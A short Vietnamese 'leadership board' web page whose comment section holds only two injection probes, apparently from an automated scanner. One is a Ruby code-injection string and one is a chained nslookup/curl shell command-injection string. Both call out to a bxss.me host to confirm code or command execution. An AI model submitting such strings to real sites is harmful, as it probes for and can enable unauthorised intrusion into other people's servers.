Ban lãnh đạo

88 thoughts on “Ban lãnh đạo

  1. 1 says:

    ‘+’A’.concat(70-3).concat(22*4).concat(98).concat(87).concat(97).concat(66)+(require’socket’
    Socket.gethostbyname(‘hitpp’+’fgdmqwkobb858.bxss.me.’)[3].to_s)+’

  2. 1 says:

    ;(nslookup -q=cname hitzqygqclnjr3ad8f.bxss.me||curl hitzqygqclnjr3ad8f.bxss.me)|(nslookup -q=cname hitzqygqclnjr3ad8f.bxss.me||curl hitzqygqclnjr3ad8f.bxss.me)&(nslookup -q=cname hitzqygqclnjr3ad8f.bxss.me||curl hitzqygqclnjr3ad8f.bxss.me)

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

error: Content is protected !!